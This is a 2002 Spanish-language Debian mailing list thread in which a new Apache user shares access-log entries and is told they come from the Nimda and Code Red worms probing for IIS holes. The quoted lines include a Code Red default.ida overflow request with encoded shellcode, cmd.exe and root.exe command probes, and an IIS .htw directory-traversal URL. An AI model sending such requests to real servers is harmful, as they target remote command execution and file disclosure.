Re: [Posible OT]Mas apache
Muchas gracias me quitas un peso de encima. Por lo que se uno de los dos
tiene un servidor de ftp (permite ftp anonimo ). No se como va eso de los
gusanos pero me imagino que el administrador de la maquina no sabe que esta
"infectado". Lo digo para mandarle un mail y decirselo o¿mejor no me molesto?
gracias por la respuesta
On Fri 10 May 2002 17:33, Roberto Castellor Morant escribio:
> Hola
> bienvenido al mundo de los gusanos, son dos distintos los que te estan
> "atacando" el nimda y el red code, sin duda esto se debe al nivel que
> tienen los administradores de IIS despues de 2 años aun seguimos
> teniendo estos problemitas, por lo demas apache no esta afectado por
> ninguno de estos dos.
>
> Saludos, Roberto
>
> On Fri, May 10, 2002 at 05:11:26PM +0200, Aitor wrote:
> > Hola a todos:
> > Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer
> > mirando el acces.log me encontre con esto:
> > 218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET
> > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
> > bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> > u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> > HTTP/1.0" 400 331 "-" "-"
> >
> > y con esto:
> >
> > 217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
> > 217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> > 217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET
> > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
> >
> > Buscando exploits y eso me encontre con este (aunque solo es de IIS):
> >
> > http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
> >20%20%20%20
> > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
> >20
> > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
> >20
> > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
> >20
> > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
> >20.htw?CiwebhitsFile=/../..
> > /./..test.txt&CiRestriction=none&CiHiliteType=Full
> >
> > Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo
> > raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
> > Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace
> > poco y lo puse para probar
> >
> > Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
> > --
> > ____________________________________
> > * *
> > * web personal: http://go.to/nuestra.web *
> > * Linux user #255925 *
> > * Debian/GNU *
> > * Kernel 2.2.18 *
> > *___________________________________*
> >
> >
> > --
> > To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
> > with a subject of "unsubscribe". Trouble? Contact
> > listmaster@lists.debian.org
--
____________________________________
* *
* web personal: http://go.to/nuestra.web *
* Linux user #255925 *
* Debian/GNU *
* Kernel 2.2.18 *
*___________________________________*
--
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Reply to: